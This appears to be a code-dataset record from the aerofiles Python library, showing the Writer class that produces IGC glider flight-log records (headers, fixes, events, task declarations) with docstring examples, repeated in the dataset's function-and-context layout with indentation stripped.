time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_fix | python | def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record) | Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions` | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L661-L719 | [
"def format_latitude(self, value):\n return self.format_coordinate(\n value, default='0000000N', is_latitude=True)\n",
"def format_longitude(self, value):\n return self.format_coordinate(\n value, default='00000000E', is_latitude=False)\n",
"def format_time(self, time):\n if isinstance(ti... | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_event | python | def write_event(self, *args):
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record) | Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional) | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L721-L767 | [
"def format_time(self, time):\n if isinstance(time, datetime.datetime):\n time = time.time()\n\n if isinstance(time, datetime.time):\n time = time.strftime('%H%M%S')\n\n if not patterns.TIME.match(time):\n raise ValueError(\"Invalid time: \" + time)\n\n return time\n",
"def write_... | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
